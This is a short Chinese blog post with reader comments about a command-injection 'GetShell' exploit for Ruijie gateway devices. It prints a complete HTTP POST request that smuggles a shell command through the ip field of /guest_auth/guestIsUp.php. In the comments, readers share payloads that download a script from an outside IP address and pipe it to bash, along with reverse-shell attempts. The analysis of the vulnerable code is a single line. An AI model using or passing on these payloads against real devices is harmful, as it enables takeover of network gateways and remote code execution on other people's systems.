锐捷网关系列通杀GetShell代码分析
2020 1-11 看到群里发了一个锐捷网关系列通杀GetShell 的漏洞
https://github.com/Tas9er/EgGateWayGetShell
下载jar 文件。使用jd-gui 打开源码。
可以看到的是。
通过POST /guest_auth/guestIsUp.php URL post 了一个代码执行的命令。
EXP如下:
POST /guest_auth/guestIsUp.php HTTP/1.1
Host: 192.168.10.1
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
mac=1&ip=127.0.0.1|curl xxx.dnslog.cn
反弹shell 回来。查看一下代码是什么样子的。
啊。这。代码。直接调用cmd 代码执行了。
@print 师傅 我这边一直反弹不回来shell 可以加微信请教吗
@lzd**** 你能连上shell吗
@SINFVNCTION 我傻了 没转过来
找到了
github项目不见了呀,还有下载链接吗
@lzd**** 被杀了呀 大兄弟
tql师傅,我2b了,这都没想到,一开始用$(echo xxxx|base64 -d|bash) 然后一直不行
访问的时候
一直显示404
咋整呀老哥
可以的师傅
的有
actionscript
mac=1&ip=`curl http://155.94.154.207:8080/help.sh |bash`
@SINFVNCTION mac=1&ip=
curl http://114.114.114.114:8080/help.sh |bash
想问一下是怎么做到反弹shell的,我编码怎么都弹不回来,求payload